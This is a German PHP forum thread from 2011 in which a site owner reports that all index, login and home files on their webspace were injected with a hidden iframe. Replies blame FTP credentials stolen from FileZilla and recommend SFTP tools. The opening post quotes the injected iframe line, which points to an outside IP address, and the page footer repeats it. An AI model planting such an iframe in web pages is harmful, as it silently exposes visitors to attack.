php.de

Zurück   php.de > Webentwicklung > Server, Hosting und Workstations

Server, Hosting und Workstations Server-Konfigurationsdateien (.htaccess/httpd.conf) und Arbeiten auf Serverebene

Antwort
 
LinkBack Themen-Optionen Thema bewerten
Alt 21.01.2011, 17:22  
Erfahrener Benutzer
 
Registriert seit: 21.01.2008
Beiträge: 595
themonk ist zur Zeit noch ein unbeschriebenes Blatt
Standard [Erledigt] Index Datein auf Webspace geändert

Hallo,
ich hoffe hier ist der richtige Bereich für mein Anliegen.
Ich habe folgendes Problem und zwar sind in meinem Webspace alle index,login und home Dateien mit folgenden Code versehen:
<iframe src="http://[80.91.191.158]/stats/priemIframe.php?part=2&hashftp=xxxx&hashpage=xxxxx x" width=10 border=1 height=10 style="visibility:hidden"></iframe>

Selbst in Unterordnern die eigentlich ohne weiteres aufgerufen werden können wurden infiziert.
Könnt ihr mir vielleicht sagen woran das liegen kann das alle Dateien zum gleichen Zeitpunkt verändert wurden?
Könnte das ein Fehler im Skript sein oder liegt es am Server?
themonk ist offline   Mit Zitat antworten
Sponsor Mitteilung
PHP Code Flüsterer

Registriert seit: 21.08.2005
Beiträge: 4682
PHP-Kenntnisse:
Fortgeschritten

Alt 21.01.2011, 17:46  
Moderator
 
Benutzerbild von Chriz
 
Registriert seit: 11.05.2008
Beiträge: 6.269
Chriz ist ein wunderbarer AnblickChriz ist ein wunderbarer AnblickChriz ist ein wunderbarer AnblickChriz ist ein wunderbarer AnblickChriz ist ein wunderbarer AnblickChriz ist ein wunderbarer AnblickChriz ist ein wunderbarer Anblick
Standard

Dann wurde dein Server möglicherweise gehackt. Evtl. sogar gleich über ne Schwachstelle in deinen eigenen Skripten. Lässt sich so aber nicht sagen, ist ne Vermutung.
__________________
"Nuschel ich?" - "Was?"
Chriz ist gerade online   Mit Zitat antworten
Alt 25.01.2011, 21:59  
Neuer Benutzer
 
Registriert seit: 25.01.2011
Beiträge: 6
PHP-Kenntnisse:
Fortgeschritten
int13 befindet sich auf einem aufstrebenden Ast
Standard

Zitat:
Zitat von Chriz Beitrag anzeigen
Dann wurde dein Server möglicherweise gehackt. Evtl. sogar gleich über ne Schwachstelle in deinen eigenen Skripten. Lässt sich so aber nicht sagen, ist ne Vermutung.
Ja er wurde gehackt. Hat vermutlich Filezilla zum hochladen der Dateien verwendet.

Mehr infos darüber, wo es herkommt und wie man es entfernt hier in meinem Blog:

http://integer13.wordpress.com/2011/...chainreaction/

Gruß,

Andre
int13 ist offline   Mit Zitat antworten
Alt 25.01.2011, 22:31  
Erfahrener Benutzer
 
Registriert seit: 25.05.2010
Beiträge: 852
PHP-Kenntnisse:
Anfänger
Trainmaster wird schon bald berühmt werden
Standard

Ist wohl an der Zeit, über einen andere FTP-Client nachzudenken. Brauchbare Alternativen?
Trainmaster ist offline   Mit Zitat antworten
Alt 25.01.2011, 22:37  
Neuer Benutzer
 
Registriert seit: 25.01.2011
Beiträge: 6
PHP-Kenntnisse:
Fortgeschritten
int13 befindet sich auf einem aufstrebenden Ast
Standard

Zitat:
Zitat von Trainmaster Beitrag anzeigen
Ist wohl an der Zeit, über einen andere FTP-Client nachzudenken. Brauchbare Alternativen?
Ich würde WinSCP empfehlen. Damit ist auch das Klartext FTP tot...

Gruss,

Andre Fassbender
int13 ist offline   Mit Zitat antworten
Alt 25.01.2011, 22:55  
Moderator
 
Registriert seit: 06.06.2008
Beiträge: 4.945
PHP-Kenntnisse:
Fortgeschritten
Wolla ist ein wunderbarer AnblickWolla ist ein wunderbarer AnblickWolla ist ein wunderbarer AnblickWolla ist ein wunderbarer AnblickWolla ist ein wunderbarer AnblickWolla ist ein wunderbarer AnblickWolla ist ein wunderbarer Anblick
Wolla eine Nachricht über ICQ schicken
Standard

hat sich erledigt
__________________
Warum denkt mein Hund eigentlich immer dann, wenn es an der Tür klingelt, es sei für ihn?
Wolla ist offline   Mit Zitat antworten
Alt 25.01.2011, 23:01  
Erfahrener Benutzer
 
Registriert seit: 07.06.2008
Beiträge: 992
PHP-Kenntnisse:
Fortgeschritten
Frank befindet sich auf einem aufstrebenden Ast
Frank eine Nachricht über ICQ schicken Frank eine Nachricht über MSN schicken Frank eine Nachricht über Yahoo! schicken
Standard

Zitat:
Zitat von int13 Beitrag anzeigen
Ich würde WinSCP
Auf windows nutze ich WinSCP schon seit je her. Der Nachteil ist das Wort "WIN" davor, denn auf linux ist man einigermaßen aufgeschmissen. Habe zumindest noch nichts grafisches gesehen, was in die Nähe von winscp kommt. Habe mir also angewöhnt, gleich über die Konsole zu arbeiten (sftp).

Ich werde mal versuchen, den source von winscp auf linux zu compilieren.


Die frage mit der XML Datei ist natürlich, wie sind die an die XML gekommen, da war wohl von vornherein der PC nicht sauber.
__________________
Frank ist offline   Mit Zitat antworten
Alt 25.01.2011, 23:05  
Erfahrener Benutzer
 
Registriert seit: 21.01.2008
Beiträge: 595
themonk ist zur Zeit noch ein unbeschriebenes Blatt
Standard

Danke!
Jetzt weiß ich endlich wie die die Datein ändern konnten
themonk ist offline   Mit Zitat antworten
Alt 25.01.2011, 23:22  
Neuer Benutzer
 
Registriert seit: 25.01.2011
Beiträge: 6
PHP-Kenntnisse:
Fortgeschritten
int13 befindet sich auf einem aufstrebenden Ast
Standard

Zitat:
Zitat von Frank Beitrag anzeigen
...
Ich werde mal versuchen, den source von winscp auf linux zu compilieren.
Du musst zeit haben..


Hast mal sshfs angesehen, das kannst du einfach als filesystem mounten

http://www.go2linux.org/sshfs-mount-...stem-using-ssh

das kannst du dann auch in gnome schön mit dreck&drop kopieren
int13 ist offline   Mit Zitat antworten
Alt 26.01.2011, 10:20  
Moderator
 
Registriert seit: 06.06.2008
Beiträge: 4.945
PHP-Kenntnisse:
Fortgeschritten
Wolla ist ein wunderbarer AnblickWolla ist ein wunderbarer AnblickWolla ist ein wunderbarer AnblickWolla ist ein wunderbarer AnblickWolla ist ein wunderbarer AnblickWolla ist ein wunderbarer AnblickWolla ist ein wunderbarer Anblick
Wolla eine Nachricht über ICQ schicken
Standard

Mein Fachenglisch reicht nicht aus, um zu verstehen, was es mit diesen gespeicherten "credentials" auf sich hat. Der Begriff ist mir noch nicht untergekommen.

Kann das jemand mal in deutsch erklären?
__________________
Warum denkt mein Hund eigentlich immer dann, wenn es an der Tür klingelt, es sei für ihn?
Wolla ist offline   Mit Zitat antworten
Antwort


Themen-Optionen
Thema bewerten
Thema bewerten:

Forumregeln
Es ist dir nicht erlaubt, neue Themen zu verfassen.
Es ist dir nicht erlaubt, auf Beiträge zu antworten.
Es ist dir nicht erlaubt, Anhänge hochzuladen.
Es ist dir nicht erlaubt, deine Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks are an
Pingbacks are an
Refbacks are an
Gehe zu

Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
Fehlende Werte im Index füllen akogler Datenbanken 6 29.12.2010 20:49
[Erledigt] jQuery: current index Paul.Schramenko JavaScript, Ajax und mehr 34 19.07.2010 10:30
[Erledigt] Datenfelder mit Index, Datenbankabgleich Herr Jeh Datenbanken 2 08.02.2010 05:01
Biete Webspace mit Domain auf schnellem Server zu Duping-Preis an! 75MrCoolBoy Off-Topic Diskussionen 9 07.02.2010 22:16
Passwortschutz für Index DiDi90 Server, Hosting und Workstations 6 03.02.2010 16:41
[Erledigt] MYSQL INDEX Frage 700.000 Datensätze ? c01001 Datenbanken 2 20.04.2009 13:55
php datei löschen djscaleo PHP Tipps 2008 21 14.11.2008 15:47
Undefined variable Undefined property: block xxJJxx PHP Tipps 2008 16 05.08.2008 15:30
Notice: Undefined index Kein Genie PHP Tipps 2008 5 23.04.2008 17:40
Prototype Ajax Array Datenmüll notyyy HTML, Usability und Barrierefreiheit 2 08.04.2008 10:57
Array index updaten obi PHP Tipps 2008 4 28.11.2007 15:08
Index vom Array zurücksetzen kampfnickel PHP Tipps 2007 6 08.01.2007 17:24
mysql_num_row unde Index bleibt trotzdem 0 in der DB nieselfriem PHP Tipps 2005-2 7 30.07.2005 17:30
2 verschachtelte while Schleifen. Großes Performanceproblem Datenbanken 3 30.05.2005 12:52
Undefined index PHP Tipps 2005 5 05.02.2005 14:57

Besucher kamen über folgende Suchanfragen bei Google auf diese Seite
80.91.191.158, http://80.91.191.158/stats/priemiframe.php, priemiframe, http://80.91.191.158, priemiframe.php, http://80.91.191.158/, <iframe src=\http://80.91.191.158, <iframe src=\http://80.91.191.158/stats, <iframe src=\http://80.91.191.158/stats/priemiframe.php?, iframe 80.91.191.158, <iframe src=\http://80.91.191.158/stats/priemiframe.php, http://80.91.191.158/stats/priemiframe.php?, iframe src=\http://80.91.191.158, \80.91.191.158\, 80.91.191.158 iframe, <iframe src=\http://80.91.191.158/, webspace index ändern, \http://80.91.191.158/stats/priemiframe.php\, http://80.91.191.158/stats/priemiframe.php?part=2&hashftp=2, wordpress-script stats/priemiframe.php?

Alle Zeitangaben in WEZ +2. Es ist jetzt 21:59 Uhr.




Powered by vBulletin® Version 3.7.2 (Deutsch)
Copyright ©2000 - 2012, Jelsoft Enterprises Ltd.
Search Engine Optimization by vBSEO 3.2.0
Aprilia-Forum, Aquaristik-Forum, Liebeskummer-Forum, Zierfisch-Forum, Geizkragen-Forum